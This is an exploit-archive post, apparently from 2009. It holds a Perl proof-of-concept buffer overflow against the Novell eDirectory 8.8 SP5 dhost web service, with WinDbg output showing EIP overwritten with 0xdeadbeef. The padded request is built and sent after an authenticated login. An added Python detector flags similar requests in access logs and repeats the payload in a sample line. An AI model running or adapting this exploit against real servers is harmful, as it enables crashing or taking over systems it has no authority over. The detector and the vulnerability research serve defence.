Novell eDirectory version 8.8 SP5 for Windows proof of concept buffer overflow e
Source: http://tcc.hellcode.net/  Author: murderkey  Published: 2009-10-27
#!/usr/bin/perl
#PoC for Vulnerability:
#Novell eDirectory 8.8 SP5 BoF Vuln - 0day
#Vulnerability found in Hellcode Labs.
#karak0rsan || murderkey
#info[at]hellcode.net || www.hellcode.net
#to GamaSEC: "please continue to discover and publish XSS BUGS.. you can just do that ;)"
#http://www.youtube.com/watch?v=6bloyjV-Hhs

use WWW::Mechanize;
use LWP::Debug qw(+);
use HTTP::Cookies;
use HTTP::Request;

my $target = $ARGV[0];

if(!$ARGV[0]){
        print "Novell eDirectory 8.8 SP5 Exploit\n";
        print "Hellcode Research || Hellcode.net\n";
        print "Usage:perl $0 [target]\n";
        exit();
}

my $login_url = "$target/_LOGIN_SERVER_";
my $url       = "$target/dhost/";
my $vuln      = "modules?L:";
my $nop       = "\x90" x 1668;          # 0x90 padding
my $eip       = "\xef\xbe\xad\xde";     # 0xdeadbeef, little-endian; ends up in EIP (see debugger output)
my $data      = "B" x 235;              # 'B' = 0x42, the value seen in EAX at the first crash

my $hellcode = $vuln.$nop.$eip.$data;

########Write your usr and pwd########
my $username = "Admin.context";
my $password = "1234";

# Both of these were used but never defined in the original post.
my $cookie_file = "cookies.txt";
my $url_timeout = 30;   # seconds

my $mechanize = WWW::Mechanize->new();
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file", autosave => 1));
$mechanize->timeout($url_timeout);

# Authenticate first; the vulnerable path is reached after login.
my $res = $mechanize->request(HTTP::Request->new('GET', "$login_url"));
$mechanize->submit_form(
                  form_name => "authenticator",
                  fields    => { usr => $username, pwd => $password },
                  button    => 'Login');

# Send the oversized module name to dhost.
my $response2 = $mechanize->get("$url$hellcode");



##Debugger Results of PoC:

Windbg- File>Attach to a process>dhost.exe

eax=7ff43000 ebx=00000000 ecx=00000000 edx=778ad094 esi=00000000 edi=00000000
eip=77867dfe esp=1630ff5c ebp=1630ff88 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
*** ERROR: Symbol file could not be found.  
Defaulted to export symbols for C:\Windows\system32\ntdll.dll - 
ntdll!DbgBreakPoint:
77867dfe cc              int     3
0:088> g

Debuggee is running...


##C:\Users\DELL\Videos\karak0rsan\Perl\bin>perl novelbof.pl

##Debugger Results after running poc:

(1cc.1d44): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000042 ebx=15700796 ecx=038af878 edx=038b0000 esi=038af62c edi=038af878
eip=75c11684 esp=038af5c0 ebp=038af660 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Symbol file could not be found.  
Defaulted to export symbols for 
C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.3053_none_d08d7bba442a9b36\MSVCR80.dll - 
MSVCR80!vfwprintf_p+0x5b:
75c11684 8802            mov     byte ptr [edx],al          ds:0023:038b0000=??

-- EAX = 00000042 (the low byte of EAX, 'B', is being written out of bounds)

##0:010> g

(8e4.bb4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=deadbeef edx=77879bad esi=00000000 edi=00000000
eip=deadbeef esp=036bf1f0 ebp=036bf210 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
deadbeef ??              ???

#EIP=deadbeef - We controlled EIP ;)
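Added example (not part of the original post): a small detector for requests shaped like this PoC, run over access-log lines from a proxy or logger in front of the dhost HTTP service. It assumes Common Log Format (the page does not show dhost's own log format), and that LWP percent-encodes the raw 0x90 bytes, so the argument is decoded before its length and longest repeated-byte run are measured.

```python
import re
from typing import List, Optional
from urllib.parse import unquote_to_bytes

# Common Log Format line (assumption: dhost's own log format is not on the page).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The PoC request is /dhost/modules?L: followed by ~1.9 KB of data
# (1668 x 0x90, 4 bytes of return address, 235 x 'B').
VULN_PREFIX = "/dhost/modules?L:"
MAX_ARG_LEN = 256   # assumption: real module names are far shorter than this
MIN_RUN = 64        # a long run of one byte is the signature of padding

def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte in data."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best

def inspect(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m or not m.group("path").startswith(VULN_PREFIX):
        return None
    # Percent-decode so %90%90... is measured as raw bytes.
    arg = unquote_to_bytes(m.group("path")[len(VULN_PREFIX):])
    run = longest_run(arg)
    if len(arg) <= MAX_ARG_LEN and run < MIN_RUN:
        return None
    return {"src": m.group("src"), "ts": m.group("ts"), "status": m.group("status"),
            "decoded_len": len(arg), "longest_run": run}

def scan(lines: List[str]) -> List[dict]:
    return [f for f in map(inspect, lines) if f]

# Constructed sample lines: a normal module request, one shaped like the PoC, one unrelated.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Oct/2009:10:12:31 +0000] "GET /dhost/modules?L:httpstk HTTP/1.1" 200 512',
    '10.0.0.9 - - [27/Oct/2009:10:13:02 +0000] "GET /dhost/modules?L:'
    + "%90" * 300 + "%EF%BE%AD%DE" + "B" * 235 + ' HTTP/1.1" 500 0',
    '10.0.0.5 - - [27/Oct/2009:10:13:40 +0000] "GET /dhost/ HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```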


 